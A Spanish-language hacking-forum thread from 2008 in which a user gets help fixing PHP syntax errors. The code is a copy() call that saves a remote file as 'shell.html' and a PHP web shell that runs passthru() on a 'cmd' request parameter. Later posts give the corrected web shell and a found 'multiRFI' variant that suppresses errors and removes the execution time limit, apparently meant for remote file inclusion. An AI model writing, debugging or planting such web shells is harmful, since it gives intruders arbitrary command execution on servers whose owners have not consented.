elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Programación
| |-+  Desarrollo Web
| | |-+  PHP (Moderador: #!drvy)
| | | |-+  duda con copy en php "Resuelto"
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: duda con copy en php "Resuelto"  (Leído 6,190 veces)
BBOYHACK

Desconectado Desconectado

Mensajes: 169


#Bboyhacks#


Ver Perfil WWW
duda con copy en php "Resuelto"
« en: 22 Septiembre 2008, 18:11 pm »

Buenas Señores estoy trantando de usar el Copy de php pero me da un error de sistacis

Código:
<? copy(“http://192.168.200.2/web/0.html”,”shell.html”); ?>

estoy tratando de que copi un archivo pero cuando ejecuto el PHP me dice

Código:
Parse error: syntax error, unexpected ':'

alguien puede revisar la sintaxis a ver si es que me equivoque gracias


« Última modificación: 22 Septiembre 2008, 22:25 pm por BBOYHACK » En línea

lastimosamente no puedo dirigirme a un cajero de un banco y decirle alto y claro:
Soy Bill Gates y deseo retirar 2 Millones de dolares y mi codigo es Windows


Blackhacking.no-ip.org
Rentero
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.164


La paciencia es la madre de la ciencia.


Ver Perfil
Re: duda con copy en php
« Respuesta #1 en: 22 Septiembre 2008, 18:47 pm »

Debe ser por los dos puntos de http:// de todas formas parece que estas usando unas comillas un tanto "raras" xD. Prueba con comillas simples, aver que tal.

Código:
<? copy('http://192.168.200.2/web/0.html', 'shell.html'); ?>

Aunque yo lo uso con comillas dobles de toda la vida y funciona.


En línea

Firmado.
дٳŦ٭
GNU/Linux Infrastructure Specialist
Ex-Staff
*
Desconectado Desconectado

Mensajes: 5.110


Ver Perfil WWW
Re: duda con copy en php
« Respuesta #2 en: 22 Septiembre 2008, 19:19 pm »

<? copy(“http://192.168.200.2/web/0.html”,”shell.html”); ?>

Código
  1. <? copy("http://192.168.200.2/web/0.html","shell.html"); ?>

http://www.php.net/copy
En línea

BBOYHACK

Desconectado Desconectado

Mensajes: 169


#Bboyhacks#


Ver Perfil WWW
Re: duda con copy en php
« Respuesta #3 en: 22 Septiembre 2008, 22:21 pm »

<? copy(“http://192.168.200.2/web/0.html”,”shell.html”); ?>

Código
  1. <? copy("http://192.168.200.2/web/0.html","shell.html"); ?>

http://www.php.net/copy

Muchas gracias aparentemente ya resolvie eso gracias amigo quien iva a decir que la configuracion de mi teclado influye

bueno ahora tengo este pequeño error pero es que no se si tengo que cerrar el [
Parse error: syntax error, unexpected ')', expecting ']' in /var/www/blindware/htdocs/_controlp/shell.php on line 3

<?
header("Content-Type: text/plain");
passthru($_GET["cmd");
?>

En línea

lastimosamente no puedo dirigirme a un cajero de un banco y decirle alto y claro:
Soy Bill Gates y deseo retirar 2 Millones de dolares y mi codigo es Windows


Blackhacking.no-ip.org
BBOYHACK

Desconectado Desconectado

Mensajes: 169


#Bboyhacks#


Ver Perfil WWW
Re: duda con copy en php
« Respuesta #4 en: 22 Septiembre 2008, 22:24 pm »

Ya lo Resolvi

solo modifique el code un poco con algo que encontre en google

<?php
echo "_START_multiRFI_limit_multiRFI_limit_multiRFI_\n";
ini_set("max_execution_time",0);
error_reporting(0);
passthru($_REQUEST[cmd]);
echo "\n_END_multiRFI_limit_multiRFI_limit_multiRFI_\n";
?>



En línea

lastimosamente no puedo dirigirme a un cajero de un banco y decirle alto y claro:
Soy Bill Gates y deseo retirar 2 Millones de dolares y mi codigo es Windows


Blackhacking.no-ip.org
Rentero
Ex-Staff
*
Desconectado Desconectado

Mensajes: 1.164


La paciencia es la madre de la ciencia.


Ver Perfil
Re: duda con copy en php "Resuelto"
« Respuesta #5 en: 22 Septiembre 2008, 23:39 pm »

El problema era que te faltaba un corchete.

Código
  1. <?
  2. header("Content-Type: text/plain");
  3. passthru($_GET["cmd"]);
  4. ?>
En línea

Firmado.
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Ayuda " copy file "
Programación Visual Basic
NightMore 6 4,277 Último mensaje 2 Enero 2011, 12:15 pm
por Hurubnar
Problema con PE Editor, no aparece la opción "COPY A SECTION FROM HD....
Ingeniería Inversa
.:UND3R:. 5 2,905 Último mensaje 18 Junio 2011, 05:46 am
por .:UND3R:.
duda copy BATCH
Scripting
asdexiva 4 2,897 Último mensaje 1 Noviembre 2012, 22:37 pm
por asdexiva
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines